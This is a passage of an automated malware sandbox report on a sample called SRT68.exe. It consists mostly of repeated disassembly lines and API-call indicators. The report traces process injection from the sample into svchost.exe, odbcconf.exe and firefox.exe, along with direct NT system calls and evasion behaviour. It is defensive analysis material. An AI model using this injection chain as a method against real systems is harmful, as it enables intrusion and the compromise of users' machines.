                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804B00 mov eax, dword ptr fs:[00000030h]2_2_03804B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]2_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]2_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]2_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EBFC mov eax, dword ptr fs:[00000030h]2_2_0375EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BCBF0 mov eax, dword ptr fs:[00000030h]2_2_037BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DEBD0 mov eax, dword ptr fs:[00000030h]2_2_037DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]2_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]2_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]2_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]2_2_03730BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]2_2_03730BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]2_2_03730BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740BBE mov eax, dword ptr fs:[00000030h]2_2_03740BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740BBE mov eax, dword ptr fs:[00000030h]2_2_03740BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E4BB0 mov eax, dword ptr fs:[00000030h]2_2_037E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E4BB0 mov eax, dword ptr fs:[00000030h]2_2_037E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]2_2_03802B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]2_2_03802B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]2_2_03802B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]2_2_03802B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804A80 mov eax, dword ptr fs:[00000030h]2_2_03804A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037ACA72 mov eax, dword ptr fs:[00000030h]2_2_037ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037ACA72 mov eax, dword ptr fs:[00000030h]2_2_037ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]2_2_0376CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]2_2_0376CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]2_2_0376CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DEA60 mov eax, dword ptr fs:[00000030h]2_2_037DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740A5B mov eax, dword ptr fs:[00000030h]2_2_03740A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740A5B mov eax, dword ptr fs:[00000030h]2_2_03740A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03754A35 mov eax, dword ptr fs:[00000030h]2_2_03754A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03754A35 mov eax, dword ptr fs:[00000030h]2_2_03754A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA38 mov eax, dword ptr fs:[00000030h]2_2_0376CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA24 mov eax, dword ptr fs:[00000030h]2_2_0376CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EA2E mov eax, dword ptr fs:[00000030h]2_2_0375EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BCA11 mov eax, dword ptr fs:[00000030h]2_2_037BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376AAEE mov eax, dword ptr fs:[00000030h]2_2_0376AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376AAEE mov eax, dword ptr fs:[00000030h]2_2_0376AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730AD0 mov eax, dword ptr fs:[00000030h]2_2_03730AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03764AD0 mov eax, dword ptr fs:[00000030h]2_2_03764AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03764AD0 mov eax, dword ptr fs:[00000030h]2_2_03764AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]2_2_03786ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]2_2_03786ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]2_2_03786ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738AA0 mov eax, dword ptr fs:[00000030h]2_2_03738AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738AA0 mov eax, dword ptr fs:[00000030h]2_2_03738AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786AA4 mov eax, dword ptr fs:[00000030h]2_2_03786AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768A90 mov edx, dword ptr fs:[00000030h]2_2_03768A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4978 mov eax, dword ptr fs:[00000030h]2_2_037D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4978 mov eax, dword ptr fs:[00000030h]2_2_037D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BC97C mov eax, dword ptr fs:[00000030h]2_2_037BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]2_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]2_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]2_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E mov eax, dword ptr fs:[00000030h]2_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E mov edx, dword ptr fs:[00000030h]2_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E mov eax, dword ptr fs:[00000030h]2_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0946 mov eax, dword ptr fs:[00000030h]2_2_037B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B892A mov eax, dword ptr fs:[00000030h]2_2_037B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C892B mov eax, dword ptr fs:[00000030h]2_2_037C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BC912 mov eax, dword ptr fs:[00000030h]2_2_037BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728918 mov eax, dword ptr fs:[00000030h]2_2_03728918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728918 mov eax, dword ptr fs:[00000030h]2_2_03728918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE908 mov eax, dword ptr fs:[00000030h]2_2_037AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE908 mov eax, dword ptr fs:[00000030h]2_2_037AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037629F9 mov eax, dword ptr fs:[00000030h]2_2_037629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037629F9 mov eax, dword ptr fs:[00000030h]2_2_037629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE9E0 mov eax, dword ptr fs:[00000030h]2_2_037BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037649D0 mov eax, dword ptr fs:[00000030h]2_2_037649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FA9D3 mov eax, dword ptr fs:[00000030h]2_2_037FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C69C0 mov eax, dword ptr fs:[00000030h]2_2_037C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804940 mov eax, dword ptr fs:[00000030h]2_2_03804940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B89B3 mov esi, dword ptr fs:[00000030h]2_2_037B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B89B3 mov eax, dword ptr fs:[00000030h]2_2_037B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B89B3 mov eax, dword ptr fs:[00000030h]2_2_037B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037309AD mov eax, dword ptr fs:[00000030h]2_2_037309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037309AD mov eax, dword ptr fs:[00000030h]2_2_037309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE872 mov eax, dword ptr fs:[00000030h]2_2_037BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE872 mov eax, dword ptr fs:[00000030h]2_2_037BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6870 mov eax, dword ptr fs:[00000030h]2_2_037C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6870 mov eax, dword ptr fs:[00000030h]2_2_037C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760854 mov eax, dword ptr fs:[00000030h]2_2_03760854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734859 mov eax, dword ptr fs:[00000030h]2_2_03734859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734859 mov eax, dword ptr fs:[00000030h]2_2_03734859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03742840 mov ecx, dword ptr fs:[00000030h]2_2_03742840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]2_2_03752835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]2_2_03752835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]2_2_03752835
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FF80A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_00FF80A9
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FCA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00FCA155
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FCA124 SetUnhandledExceptionFilter,0_2_00FCA124

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exeNtCreateMutant: Direct from: 0x774635CCJump to behavior
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exeNtWriteVirtualMemory: Direct from: 0x77462E3CJump to behavior
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exeNtMapViewOfSection: Direct from: 0x77462D1CJump to behavior
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exeNtResumeThread: Direct from: 0x774636ACJump to behavior
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exeNtProtectVirtualMemory: Direct from: 0x77462F9CJump to behavior
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exeNtSetInformationProcess: Direct from: 0x77462C5CJump to behavior
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exeNtSetInformationThread: Direct from: 0x774563F9Jump to behavior
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exeNtNotifyChangeKey: Direct from: 0x77463C2CJump to behavior
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exeNtAllocateVirtualMemory: Direct from: 0x77462BFCJump to behavior
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exeNtQueryInformationProcess: Direct from: 0x77462C26Jump to behavior
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exeNtResumeThread: Direct from: 0x77462FBCJump to behavior
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exeNtReadFile: Direct from: 0x77462ADCJump to behavior
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exeNtQuerySystemInformation: Direct from: 0x77462DFCJump to behavior
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exeNtDelayExecution: Direct from: 0x77462DDCJump to behavior
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exeNtAllocateVirtualMemory: Direct from: 0x77463C9CJump to behavior
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exeNtClose: Direct from: 0x77462B6C
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exeNtCreateUserProcess: Direct from: 0x7746371CJump to behavior
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exeNtWriteVirtualMemory: Direct from: 0x7746490CJump to behavior
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exeNtAllocateVirtualMemory: Direct from: 0x774648ECJump to behavior
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exeNtQuerySystemInformation: Direct from: 0x774648CCJump to behavior
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exeNtQueryVolumeInformationFile: Direct from: 0x77462F2CJump to behavior
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exeNtReadVirtualMemory: Direct from: 0x77462E8CJump to behavior
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exeNtCreateKey: Direct from: 0x77462C6CJump to behavior
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exeNtSetInformationThread: Direct from: 0x77462B4CJump to behavior
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exeNtQueryAttributesFile: Direct from: 0x77462E6CJump to behavior
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exeNtDeviceIoControlFile: Direct from: 0x77462AECJump to behavior
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exeNtOpenSection: Direct from: 0x77462E0CJump to behavior
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exeNtCreateFile: Direct from: 0x77462FECJump to behavior
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exeNtOpenFile: Direct from: 0x77462DCCJump to behavior
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exeNtQueryInformationToken: Direct from: 0x77462CACJump to behavior
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exeNtTerminateThread: Direct from: 0x77462FCCJump to behavior
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exeNtAllocateVirtualMemory: Direct from: 0x77462BECJump to behavior
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exeNtOpenKeyEx: Direct from: 0x77462B9CJump to behavior
                Source: C:\Users\user\Desktop\SRT68.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\odbcconf.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\odbcconf.exeSection loaded: NULL target: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\odbcconf.exeSection loaded: NULL target: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\odbcconf.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\odbcconf.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\odbcconf.exeThread register set: target process: 7888Jump to behavior
                Source: C:\Windows\SysWOW64\odbcconf.exeThread APC queued: target process: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exeJump to behavior
                Source: C:\Users\user\Desktop\SRT68.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2B83008Jump to behavior
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FF87B1 LogonUserW,0_2_00FF87B1
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FA3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00FA3B3A
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FA48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00FA48D7
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_01004C27 mouse_event,0_2_01004C27
                Source: C:\Users\user\Desktop\SRT68.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SRT68.exe"Jump to behavior
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exeProcess created: C:\Windows\SysWOW64\odbcconf.exe "C:\Windows\SysWOW64\odbcconf.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\odbcconf.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FF7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00FF7CAF
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FF874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00FF874B
                Source: SRT68.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
